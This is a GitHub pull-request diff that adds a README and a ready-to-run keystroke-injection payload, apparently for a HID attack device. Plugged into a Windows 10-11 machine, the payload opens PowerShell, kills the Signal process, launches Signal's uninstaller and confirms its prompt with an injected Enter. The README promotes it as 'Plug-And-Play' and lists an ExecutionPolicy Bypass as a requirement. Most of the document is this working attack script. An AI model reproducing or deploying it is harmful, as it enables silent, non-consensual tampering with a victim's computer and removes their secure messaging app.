Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
42 changes: 42 additions & 0 deletions payloads/library/execution/UninstallSignal/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,42 @@
# Uninstall Signal

A script used to uninstall signal-desktop app on Windows users.

**Category**: Execution

## Description

A script used to uninstall signal-desktop app on Windows users.

Open a PowerShell, stop the Signal proccess if it runs and then execute the uninstall file trhough general path.

## Dependencies

* Signal App installed (obviously LOL)
* ExecutionPolicy Bypass

## Settings

- Nothing to set, this payload is Plug-And-Play <3

## Credits

<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>LinkedIn
</td>
</tr>
</table>
</div>
34 changes: 34 additions & 0 deletions payloads/library/execution/UninstallSignal/payload.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,34 @@
#####################################
# #
# Title : Uninstall Signal #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10-11 #
# #
#####################################

ATTACKMODE HID

# Plug-And-Play <3

# Requirements:
# - Signal App installed
# - ExecutionPolicy Bypass

QUACK DELAY 2000
QUACK GUI r
QUACK DELAY 1000
QUACK STRING powershell
QUACK ENTER
QUACK DELAY 2000

QUACK STRING Stop-Process -Name \"Signal\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING Start-Process \"\$env:LocalAppData\Programs\signal-desktop\Uninstall Signal.exe\"
QUACK ENTER
QUACK DELAY 1000
# Popup 'Are you sure?'
QUACK ENTER
QUACK ALT F4